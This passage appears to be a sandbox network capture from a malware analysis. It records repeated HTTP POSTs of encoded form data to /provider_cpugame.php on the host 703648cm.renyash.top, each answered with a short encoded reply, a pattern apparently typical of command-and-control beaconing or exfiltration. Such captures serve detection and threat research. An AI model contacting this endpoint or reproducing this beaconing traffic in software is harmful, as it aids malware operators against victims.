                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0a 37 3b 21 0c 30 11 03 18 2b 33 2f 50 26 06 27 42 3b 0e 2e 17 32 10 2a 05 28 38 22 15 2a 20 25 5a 26 23 22 0d 24 3d 09 54 32 1e 2b 51 03 10 22 15 26 04 3a 59 30 3f 0d 0f 27 33 24 5f 36 3e 2f 1c 22 0d 3e 1d 34 2a 22 0f 33 10 00 09 29 00 2d 1d 29 27 23 05 2b 1f 34 00 3d 07 20 52 09 16 26 51 3d 38 30 54 30 06 37 09 3f 3e 3f 01 25 06 35 50 3e 04 36 1f 3f 2e 0d 0e 3e 2f 12 1b 25 0e 25 02 3d 29 29 5d 26 03 3c 57 33 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &7;!0+3/P&'B;.2*(8"* %Z&#"$=T2+Q"&:Y0?'3$_6>/">4*"3)-)'#+4= R&Q=80T07?>?%5P>6?.>/%%=))]&<W3&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:38.014905930 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:38.422400951 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:39.144129038 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:37 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 52 21 28 2e 54 26 2c 2e 0f 29 33 34 0f 25 3f 06 1a 2f 0e 0c 59 26 07 39 5e 28 05 22 51 3d 33 03 5a 26 0d 08 0d 33 3e 27 56 26 0e 2b 51 03 10 22 5d 32 3d 29 01 27 01 24 1f 24 20 20 15 22 3e 05 19 21 1d 0c 55 23 3a 3e 0b 25 3e 25 52 29 39 3d 5a 3d 42 3c 5b 3c 0f 27 1b 29 17 20 52 09 16 26 1c 3d 06 38 55 27 06 09 0f 29 3d 0a 58 26 06 2a 0e 3e 5b 22 10 28 07 20 57 3e 3f 12 1b 25 56 36 5b 3e 14 2d 5e 31 2a 05 09 33 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %R!(.T&,.)34%?/Y&9^("Q=3Z&3>'V&+Q"]2=)'$$ ">!U#:>%>%R)9=Z=B<[<') R&=8U')=X&*>["( W>?%V6[>-^1*38&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:39.145720005 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:39.554807901 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:40.273793936 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:38 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0a 20 05 3e 1f 24 3f 22 08 3c 0d 05 51 26 3c 2c 18 38 09 3d 05 25 00 25 15 3f 05 26 50 2a 20 21 58 25 23 31 53 24 2e 30 0f 26 34 2b 51 03 10 22 16 31 3d 32 5e 24 2c 30 1e 24 23 28 5c 36 58 2b 1a 22 23 2e 1c 23 3a 25 1f 30 00 3e 08 2a 17 08 07 3d 24 24 5e 3f 21 06 01 29 17 20 52 09 16 25 08 2a 3b 24 1e 30 06 23 0d 29 2d 0e 15 24 3b 3d 50 3e 3d 04 1f 3c 00 2c 57 3d 11 24 53 32 09 2a 5d 3e 14 0f 19 26 03 27 0b 24 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: & >$?"<Q&<,8=%%?&P* !X%#1S$.0&4+Q"1=2^$,0$#(\6X+"#.#:%0>*=$$^?!) R%*;$0#)-$;=P>=<,W=$S2*]>&'$(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:40.274516106 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:40.690540075 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:41.493748903 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:39 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 1e 23 15 3e 1f 24 01 3d 56 28 0d 0a 0e 24 3f 02 1d 2e 30 35 04 26 2e 13 15 2a 2b 0b 0a 2a 23 32 07 25 0d 07 54 24 3e 3b 54 24 34 2b 51 03 10 22 5f 25 2d 26 59 33 01 2b 0c 33 0d 0e 5d 20 2d 20 44 36 33 08 56 23 5f 3d 1f 27 00 3d 1b 3e 17 03 59 3e 1d 3f 02 2b 1f 09 5c 3e 17 20 52 09 16 26 50 3d 3b 28 50 27 06 06 1c 3c 3d 24 59 26 38 22 09 3e 03 00 52 3c 10 33 0c 29 2f 23 0b 25 30 2e 13 3d 04 3d 5d 24 2a 24 1a 33 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %#>$=V($?.05&.*+*#2%T$>;T$4+Q"_%-&Y3+3] - D63V#_='=>Y>?+\> R&P=;(P'<=$Y&8">R<3)/#%0.==]$*$3(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:41.494767904 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2204
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:41.946945906 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:42.726532936 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:40 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0d 37 5d 22 1c 26 2f 0c 08 3f 0d 0a 0c 32 11 06 1b 38 0e 22 5f 24 2d 36 05 28 05 32 15 3e 23 25 12 26 23 2d 54 24 3d 05 52 26 1e 2b 51 03 10 21 06 25 2e 32 13 27 59 2b 0f 24 23 3f 04 22 2e 0e 45 35 55 32 50 23 07 25 53 25 3d 25 1b 28 3a 31 13 2a 27 3f 04 2b 1f 09 5c 3f 2d 20 52 09 16 25 0f 2a 2b 28 13 30 3b 24 1f 3f 13 30 5d 24 28 0f 15 3e 13 32 52 2b 58 3c 10 2b 2c 38 14 25 1e 04 5b 29 03 25 5b 32 3a 0a 52 30 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &7]"&/?28"_$-6(2>#%&#-T$=R&+Q!%.2'Y+$#?".E5U2P#%S%=%(:1*'?+\?- R%*+(0;$?0]$(>2R+X<+,8%[)%[2:R0&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:42.728425980 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:43.135138988 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:43.846937895 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:42 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 1e 20 02 3d 0f 30 01 3d 53 3f 33 0a 09 26 06 27 44 2c 23 32 15 31 3e 13 15 2a 38 22 50 3f 30 32 00 25 33 0c 0a 33 04 33 10 31 24 2b 51 03 10 22 58 26 2d 21 07 33 01 23 0f 24 23 0a 5f 36 00 37 18 22 33 22 50 20 17 22 0d 30 00 21 1b 2a 17 3d 1d 2a 27 33 03 3f 21 37 16 2a 3d 20 52 09 16 25 0c 28 2b 34 54 33 38 34 55 28 2e 2f 06 26 16 0f 1b 3d 3e 3e 55 28 10 23 0c 3d 01 12 56 25 20 25 01 3e 04 22 03 25 2a 3c 51 30 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: % =0=S?3&'D,#21>*8"P?02%3331$+Q"X&-!3#$#_67"3"P "0!*=*'3?!7*= R%(+4T384U(./&=>>U(#=V% %>"%*<Q08&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:43.847678900 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:44.261377096 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:44.962754011 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:43 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0d 20 02 2a 56 26 3f 25 1a 29 30 3b 1d 31 2f 06 18 2f 30 03 05 26 2e 3a 00 28 15 04 1a 29 33 04 07 24 23 03 52 30 2e 33 1d 25 24 2b 51 03 10 22 1b 31 04 2e 5a 30 11 2b 0d 30 55 33 00 35 2d 34 42 35 55 25 0f 37 3a 25 1e 25 2d 3e 0e 2a 17 07 5a 2a 0a 24 16 2b 32 34 06 3e 3d 20 52 09 16 26 56 3e 38 12 1c 30 28 38 1d 3f 13 2c 5f 26 28 3d 50 29 2e 3e 56 2b 00 05 0e 2b 3f 28 53 26 0e 26 5c 28 2a 2a 02 32 03 3b 0b 27 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: & *V&?%)0;1//0&.:()3$#R0.3%$+Q"1.Z0+0U35-4B5U%7:%%->*Z*$+24>= R&V>80(8?,_&(=P).>V++?(S&&\(**2;'8&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:44.963572979 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:45.370719910 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:46.109808922 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:44 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0b 34 02 29 0f 30 01 31 57 2b 0d 2b 1f 25 2f 23 42 2e 30 26 14 25 2e 25 14 3c 15 22 1a 3f 33 00 01 24 33 2a 0b 30 3e 24 0e 24 34 2b 51 03 10 21 07 24 2d 25 03 27 11 02 1f 24 23 2f 06 21 00 20 41 35 0a 22 1e 23 39 25 54 24 07 3a 0f 29 5f 35 1d 3e 37 28 5e 3f 32 24 05 3e 07 20 52 09 16 26 55 29 5e 38 57 24 16 09 09 28 3d 2c 5e 25 38 07 51 29 04 36 57 3f 3d 33 0d 29 2f 3f 0a 26 20 25 01 2a 14 0f 5e 25 5c 3b 0a 26 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &4)01W++%/#B.0&%.%<"?3$3*0>$$4+Q!$-%'$#/! A5"#9%T$:)_5>7(^?2$> R&U)^8W$(=,^%8Q)6W?=3)/?& %*^%\;&8&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:46.110872984 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:46.517581940 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:47.244147062 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:45 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 54 23 15 36 1f 26 2f 3e 0a 28 33 38 0e 24 3f 02 1c 2e 30 0b 04 25 2d 3e 01 2b 05 2a 51 3d 1d 3a 00 26 55 21 54 24 2d 09 52 24 24 2b 51 03 10 21 00 26 2d 07 06 24 2f 0e 53 33 0d 38 15 21 3e 2c 44 22 0a 2e 51 34 29 2d 10 24 2e 25 1a 28 29 22 02 2a 24 20 18 2b 21 38 05 3f 3d 20 52 09 16 25 0c 29 5e 28 1e 27 2b 20 51 2b 2e 38 5f 31 06 03 56 3e 13 35 0c 2a 2d 3f 0f 2a 11 1d 0a 26 09 36 5d 29 04 22 07 31 3a 28 56 33 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %T#6&/>(38$?.0%->+*Q=:&U!T$-R$$+Q!&-$/S38!>,D".Q4)-$.%()"*$ +!8?= R%)^('+ Q+.8_1V>5*-?*&6])"1:(V3&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:47.244997025 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:47.651654959 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:48.401667118 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:46 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 52 23 3b 0c 11 27 01 2e 0b 28 23 2c 0f 32 11 38 18 2f 0e 0b 04 26 3e 26 06 28 2b 32 1a 29 55 39 5b 24 23 07 53 25 3e 2b 56 31 34 2b 51 03 10 22 16 26 5b 25 02 27 2c 23 0c 33 23 02 1b 36 58 24 08 36 0a 2e 13 37 5f 39 1d 27 2e 22 0e 3e 07 3e 07 29 37 2f 03 28 31 20 07 3e 2d 20 52 09 16 25 08 29 06 27 0d 25 38 20 50 29 3d 27 04 26 16 2a 0a 2a 03 04 1e 28 3e 20 57 3d 59 3b 0b 31 0e 2a 58 2a 5c 39 5b 26 39 20 50 26 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %R#;'.(#,28/&>&(+2)U9[$#S%>+V14+Q"&[%',#3#6X$6.7_9'.">>)7/(1 >- R%)'%8 P)='&**(> W=Y;1*X*\9[&9 P&(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:48.402759075 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:48.810122013 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:49.600807905 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:47 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 1e 23 02 2a 55 30 59 25 57 3c 0a 37 50 26 06 24 19 2e 23 32 59 31 00 35 5f 2a 28 32 57 29 0d 39 13 26 20 29 57 33 3d 2c 0f 31 0e 2b 51 03 10 22 5d 24 3d 22 58 26 3f 0d 0a 30 33 3b 07 21 3e 24 41 36 0a 3d 0f 21 39 3d 55 25 2d 22 0f 3d 07 25 5f 3d 1d 20 16 28 1f 20 05 3e 3d 20 52 09 16 26 56 3d 06 24 50 33 06 3c 1d 28 5b 38 15 26 16 25 50 28 2e 3e 1f 2b 3d 3c 1f 29 59 2b 0e 26 0e 32 11 2a 3a 04 03 26 14 28 52 33 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %#*U0Y%W<7P&$.#2Y15_*(2W)9& )W3=,1+Q"]$="X&?03;!>$A6=!9=U%-"=%_= ( >= R&V=$P3<([8&%P(.>+=<)Y+&2*:&(R38&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:49.601588011 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:50.010785103 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:50.729455948 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:48 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 53 23 2b 2d 0b 27 01 3e 0f 3c 0d 2f 50 25 01 33 40 38 1e 29 00 26 00 25 15 3c 5d 2a 18 2a 33 26 03 31 20 2d 57 27 3d 09 55 32 0e 2b 51 03 10 21 05 25 3d 2e 5e 27 3f 28 1f 27 0d 27 04 22 3e 3f 19 36 0d 29 0e 23 39 2e 0f 33 58 3d 51 28 2a 29 5e 29 24 28 5c 3c 57 37 5f 3f 2d 20 52 09 16 26 51 2a 06 33 0f 25 28 34 1f 3f 3d 05 06 31 06 0c 08 3e 3d 0f 0c 28 3e 01 0f 3d 11 33 0a 31 0e 31 01 3d 3a 35 5a 31 03 23 09 27 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %S#+-'></P%3@8)&%<]**3&1 -W'=U2+Q!%=.^'?(''">?6)#9.3X=Q(*)^)$(\<W7_?- R&Q*3%(4?=1>=(>=311=:5Z1#'(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:50.730350018 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:51.140605927 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:51.855381966 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:50 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 56 23 3b 2d 0a 33 01 32 0f 3c 33 20 0c 31 3c 3b 06 2f 0e 26 5f 26 2e 32 01 2a 3b 0c 15 3e 55 32 02 26 20 3e 0e 25 2e 2b 56 31 0e 2b 51 03 10 21 00 24 2d 29 00 33 3c 30 54 26 30 3b 05 20 2d 3b 1d 23 33 0c 1e 23 00 2a 0e 27 58 39 52 3d 3a 3d 59 3e 1a 23 03 3f 31 37 58 29 07 20 52 09 16 26 55 3e 5e 20 57 33 06 28 57 3f 13 38 5d 32 3b 35 1a 3e 03 22 1f 3c 3e 28 55 3e 2c 3f 0f 24 23 36 13 3e 14 2d 16 24 29 37 0e 30 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %V#;-32<3 1<;/&_&.2*;>U2& >%.+V1+Q!$-)3<0T&0; -;#3#*'X9R=:=Y>#?17X) R&U>^ W3(W?8]2;5>"<>(U>,?$#6>-$)708&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:51.856213093 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:52.263573885 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:52.983566046 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:51 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0e 23 3b 2d 0f 24 01 0c 0b 28 0a 33 56 32 3f 28 1d 2f 1e 22 5c 25 3e 13 17 2b 28 31 08 3d 0d 0b 1d 32 0d 29 54 24 3d 37 55 31 0e 2b 51 03 10 21 01 26 2e 3e 5a 33 01 06 57 24 33 27 04 35 00 01 1d 21 33 0c 56 37 00 39 1e 27 2e 3e 0f 3d 29 31 5b 3d 0a 24 5f 3f 31 06 06 3e 17 20 52 09 16 26 54 2a 06 1a 13 24 06 3b 0e 2b 3e 38 1a 26 28 2a 0b 3e 03 25 0f 28 00 30 1e 3e 3f 28 52 26 0e 3e 5a 3e 3a 00 02 32 3a 0a 51 27 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &#;-$(3V2?(/"\%>+(1=2)T$=7U1+Q!&.>Z3W$3'5!3V79'.>=)1[=$_?1> R&T*$;+>8&(*>%(0>?(R&>Z>:2:Q'&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:52.984396935 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:53.391231060 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:54.142708063 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:52 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 54 34 2b 2e 55 27 2f 26 08 28 33 30 08 32 11 20 1a 2c 0e 3e 5f 32 58 35 59 28 3b 3d 0b 3e 23 0f 12 25 1d 25 55 27 2e 2f 55 25 34 2b 51 03 10 22 1b 32 3d 26 5e 30 01 20 57 24 33 3f 05 36 58 37 18 36 0d 3e 13 23 17 22 0f 24 00 3a 09 3d 2a 29 5a 2a 1a 3c 5c 3c 08 2f 5f 2a 07 20 52 09 16 26 12 2a 3b 34 1d 27 5e 23 0c 3f 03 2b 06 26 38 29 15 29 13 26 56 2a 2e 30 54 3d 3f 20 51 32 30 21 00 29 5c 29 5d 25 2a 0e 14 33 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %T4+.U'/&(302 ,>_2X5Y(;=>#%%U'./U%4+Q"2=&^0 W$3?6X76>#"$:=*)Z*<\</_* R&*;4'^#?+&8))&V*.0T=? Q20!)\)]%*3(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:54.145025969 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:54.552005053 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:55.274697065 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:53 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0f 34 05 3e 52 30 11 3d 1b 29 33 0e 0d 31 06 3b 44 3b 23 3e 1a 25 2e 25 58 3f 05 0c 51 3d 23 25 5f 32 33 08 0f 27 13 2b 1e 24 34 2b 51 03 10 22 14 26 2d 32 59 30 3c 34 52 27 33 23 04 35 2e 24 42 21 33 2a 54 20 29 22 0b 24 58 3d 1a 28 39 25 10 2b 27 23 04 2b 32 24 06 2a 07 20 52 09 16 26 1c 3e 38 16 13 27 38 28 1d 28 03 33 07 32 01 2a 0b 2a 3e 2e 1d 2b 3d 33 0c 3d 3c 3f 0f 25 30 00 5a 3e 03 22 03 26 2a 3f 0b 33 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &4>R0=)31;D;#>%.%X?Q=#%_23'+$4+Q"&-2Y0<4R'3#5.$B!3*T )"$X=(9%+'#+2$* R&>8'8((32**>.+=3=<?%0Z>"&*?38&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:55.275549889 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:55.693779945 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:56.132213116 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:54 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
